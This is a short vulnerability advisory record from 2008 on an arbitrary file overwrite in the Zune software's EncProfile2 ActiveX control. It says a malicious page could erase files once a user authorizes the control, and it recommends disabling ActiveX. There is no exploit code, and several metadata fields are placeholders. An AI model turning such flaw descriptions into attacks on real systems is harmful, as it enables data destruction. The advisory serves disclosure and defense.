Vendor: Zune software
By: J. Bachmann & B. Mariani from ilion Research Labs
CVSS: 8.8 (HIGH)
Arbitrary file overwrite
CWE: 119
Product Name: Zune software
Affected Version From: Zune software: EncProfile2 Class
Affected Version To: Zune software: EncProfile2 Class
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
Arbitrary file overwrite
An arbitrary file overwrite has been discovered in an ActiveX control installed with the Zune software package. If a user visits a malicious page and authorizes the control to run (it is not marked safe for scripting), the attacker can erase an arbitrary file.
Mitigation:
Disable ActiveX controls in the browser settings.